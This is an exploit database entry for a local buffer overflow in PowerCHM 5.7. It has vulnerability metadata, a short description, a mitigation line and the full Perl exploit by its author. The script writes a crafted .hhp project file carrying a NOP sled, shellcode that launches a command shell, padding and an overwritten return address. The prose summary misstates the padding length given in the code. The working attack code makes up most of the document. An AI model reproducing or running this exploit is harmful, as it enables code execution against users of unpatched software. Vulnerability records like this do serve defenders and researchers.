PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit

vendor:

PowerCHM

by:

Gjoko 'LiquidWorm' Krstic

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: PowerCHM

Affected Version From: 5.7

Affected Version To: 5.7

Patch Exists: Yes

Related CWE: N/A

CPE: a:dawningsoft:powerchm

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit

PowerCHM is a software used to create CHM files from Html Files, Text Files, Microsoft Word Documents and Adobe Acrobat Document. This exploit is a local buffer overflow exploit which is tested on WinXP Pro SP2 (English). It creates a file called 'Watchmen.hhp' which contains a header and a buffer overflow code. The buffer overflow code contains a shellcode which is 8B EC 33 FF 57 C6 45 FC 63 C6 45 FD 6D C6 45 FE 64 C6 45 F8 01 8D 45 FC 50 B8 C7 93 BF 77 FF D0 and is followed by 41 bytes of padding and a return address of 0x4212EDE8.

Mitigation:

Update to the latest version of PowerCHM.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
#
# Summary: With PowerCHM you can create your CHM files
# automatically from Html Files (including .htm, .html
# and .mht), Text Files (.txt), Microsoft Word Documents
# (.doc) and Adobe Acrobat Document (.pdf).
#
# Product web page: http://www.dawningsoft.com/products/powerchm.htm
#
# Tested on WinXP Pro SP2 (English)
#
# Refs:	http://www.milw0rm.com/exploits/8300
#	http://security.biks.vn/?p=365
#
# Exploit by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 28.03.2009
#

my $header="
	[OPTIONS]\n
	Compatibility=1.1 or later\n
	Compiled file=zero.chm\n
	Contents file=science.hhc\n
	Index file=lqwrm.hhk\n
	Binary Index=Yes\n
	Language=0x042F\n
	Title=\n
	Error log file=Errlog.txt\n
	Default Window=main\n\n
	[WINDOWS]\n
	main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n
	[FILES]\n\n
	[INFOTYPES]\n
	";


my $sc ="\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45".
	"\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D".
	"\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";


my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500;

my $file = "Watchmen.hhp";
open (hhp, ">./$file") || die "\nCan't open $file: $!";
print hhp "$header" . "$bof";
close (hhp);
sleep 1;
print "\nFile $file successfully created!\n";

# milw0rm.com [2009-03-29]